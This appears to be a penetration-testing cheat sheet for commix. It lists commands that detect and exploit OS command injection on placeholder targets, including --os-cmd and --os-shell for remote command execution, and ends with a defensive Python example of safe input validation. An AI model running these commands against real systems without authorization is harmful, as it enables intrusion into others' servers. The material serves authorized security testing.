CyberCheatsheets

commix Cheat Sheet

Automated command injection detection and exploitation in web parameters and headers.

Web Application Security | command-injection | os-shell | rce | Updated 2026-06-02

Overview

commix (Command Injection Exploiter) finds and exploits OS command injection in GET/POST parameters, cookies, and User-Agent. Pair with parameter discovery (Arjun, ParamSpider) and manual fuzzing on authorized apps.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

sudo apt install -y commix

or

git clone https://github.com/commixproject/commix.git
cd commix && python commix.py -h

Essential commands

Basic URL test

python commix.py -u "http://target.example/ping?host=127.0.0.1" --batch

POST data

python commix.py -u "http://target.example/api" --data="host=127.0.0.1" --batch

Cookie injection point

python commix.py -u "http://target.example/" --cookie="session=1" --batch

Common workflows

Enumerate and get shell:

python commix.py -u "http://target.example/exec?cmd=whoami" --batch --level=3
python commix.py -u "http://target.example/exec?cmd=whoami" --os-cmd="id" --batch
python commix.py -u "http://target.example/exec?cmd=whoami" --os-shell --batch

Burp request file:

python commix.py -r request.txt --batch
python commix.py -r request.txt -p cmd --batch --level=3

Blind / time-based confirmation:

python commix.py -u "http://target.example/ping?host=127.0.0.1" --time-sec=5 --batch
python commix.py -u "http://target.example/ping?host=127.0.0.1" --technique=time --batch

Through proxy and with tamper:

python commix.py -u "http://target.example/ping?host=1" --proxy="http://127.0.0.1:8080" --batch
python commix.py -u "http://target.example/ping?host=1" --tamper=space2ifs --batch

Flags reference

Flag               Description
-u URL             Target URL
-r FILE            HTTP request file
--data             POST body
--cookie           Cookie string
-p PARAM           Vulnerable parameter
--batch            Non-interactive
--level=1-3        Test thoroughness
--os-cmd=CMD       Run single OS command
--os-shell         Pseudo-TTY shell
--technique        Injection technique filter
--time-sec=N       Time-based delay
--proxy=URL        HTTP proxy
--user-agent=UA    Custom User-Agent
--tamper=SCRIPT    Payload encoding script
--all              Test all parameters

Tips

  • Command injection often appears in ping, traceroute, image conversion, and backup features—prioritize those parameters.
  • Use --proxy with Burp to inspect payloads before sending at higher levels.
  • Blind injection: confirm with --time-sec before --os-shell.
  • Windows targets may need different separators; commix auto-detects when possible.
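
A defensive counterpart to the first tip, as an added example that is not part of the original cheat sheet or of commix: a ping feature that validates its host parameter against an allowlist and runs the command without a shell. The function names and the Linux-style "ping -c 1" invocation are assumptions made for illustration.

```python
import ipaddress
import re
import subprocess

# Hostname allowlist: dot-separated labels of letters, digits and inner hyphens.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(r"(?=.{1,253}\Z)" + _LABEL + r"(?:\." + _LABEL + r")*")


def vulnerable_command(host: str) -> str:
    """The pattern to avoid: input concatenated into a string handed to a shell."""
    return "ping -c 1 " + host  # separators in host become shell syntax


def validate_host(host: str) -> str:
    """Accept only an IP literal (no zone id) or a plain hostname."""
    if "%" not in host:  # IPv6 zone ids can carry arbitrary text, so refuse them
        try:
            return str(ipaddress.ip_address(host))
        except ValueError:
            pass
    if _HOSTNAME_RE.fullmatch(host):
        return host
    raise ValueError("host is not an IP address or hostname")


def build_ping_argv(host: str) -> list[str]:
    """Build an argv list; '--' ends option parsing so host is never read as a flag."""
    return ["ping", "-c", "1", "--", validate_host(host)]


def safe_ping(host: str, timeout: int = 5) -> int:
    """Run ping with shell=False so metacharacters are never interpreted."""
    proc = subprocess.run(build_ping_argv(host), shell=False, timeout=timeout,
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return proc.returncode
```

Either control alone narrows the problem; together, input that fails validation never reaches the process call, and input that passes is delivered as a single argument rather than as shell text.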
